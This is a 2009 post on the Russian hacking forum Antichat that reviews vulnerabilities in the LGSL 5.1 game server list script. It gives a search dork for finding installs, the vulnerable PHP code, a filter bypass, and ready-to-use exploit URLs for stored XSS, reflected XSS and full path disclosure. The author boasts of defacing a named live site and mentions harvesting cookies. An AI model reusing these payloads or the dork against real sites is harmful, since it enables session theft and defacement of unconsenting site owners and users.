ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Обзор уязвимостей LGSL 5.1
  #1  
Старый 27.06.2009, 00:36
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию Обзор уязвимостей LGSL 5.1

Продукт: LGSL 5.1 By Richard Perry
Описание: Live Game Server List
Дорк: "LGSL 5.1 By Richard Perry"


1. aXSS
активная xss существует из-за неправильной проверки переменной $request, передаваемой через GET.
в /lgsl_files/lgsl_class.php если в значении переменной $request есть символ "а", то будет произведена запись в бд.
PHP код:
function lgsl_query_cached($type$ip$c_port$q_port$s_port$request)
    {
...
      if (
strpos($request"a") !== FALSE)
      {
        
$mysql_query     "INSERT INTO `{$lgsl_config['db']['prefix']}{$lgsl_config['db']['table']}` (`type`,`ip`,`c_port`,`q_port`,`s_port`,`cache`,`cache_time`) VALUES ('{$type}','{$ip}','{$c_port}','{$q_port}','{$s_port}','','')";
        
$mysql_result    mysql_query($mysql_query) or die(mysql_error());
        
$mysql_row['id'] = mysql_insert_id();
... 
Запись в бд разрешена только админу. Но можно это сделать и не имея его прав. в файле
/lgsl_files/lgsl_feed.php производится обрезание симола "а".
PHP код:
...
  require 
"lgsl_class.php";
...
$request $lgsl_config['public_feed'] ? $request."a" str_replace("a"""$request);
... 
Эту фильтрацию можно обойти.
exploit:
Код:
/lgsl_files/lgsl_feed.php?type=rfactor&ip=bestserver<script>alert(1)</script>&c_port=2&q_port=32&s_port=4&request[]=5
значение переданной переменной request будет Array(тк не указан индекс массива), а функцией lgsl_query_cached() будет найден символ "а" и произойдет запись в бд.
example:
Код:
http://www.greycube.com/site/e107_plugins/lgsl/?s=1151
от меня там синяя надпись "hacked by hacker". криво получилось) поломал им всю статистику =\
Эта статистика ставится совместно с e107 0.7+, Joomla 1.5+, PHP Nuke и др (как написано в документации). Соответственно, можно получить многавкусныхкуков.


2. pXSS
Код:
http://lgsl/lgsl_files/lgsl_export.php?output=%3Cscript%3Ealert(1)%3C/script%3E
Код:
http://lgsl/lgsl_files/lgsl_feed.php?type=%3Cscript%3Ealert(/type/)%3C/script%3E&ip=1&c_port=2&q_port=3&s_port=4&request=5
3. Full path disclosure
Код:
http://lgsl/lgsl_files/lgsl_feed.php?type[]=rfactor&ip=ip&c_port=2&q_port=32&s_port=4&request=5
Код:
http://lgsl/lgsl_files/lgsl_feed.php?type=rfactor&ip[]=1&c_port=2&q_port=3&s_port=4&request=5
__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 27.06.2009 в 01:00..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Сценарии/CMF/СMS 184 15.06.2010 11:10
[ Обзор уязвимостей RunCMS ] Solide Snake Сценарии/CMF/СMS 37 13.05.2010 18:21
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
Обзор уязвимостей движка трекера TBSource. Arigona Сценарии/CMF/СMS 1 28.12.2008 14:42
Определиние Ip Dimann Болталка 18 09.06.2008 01:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ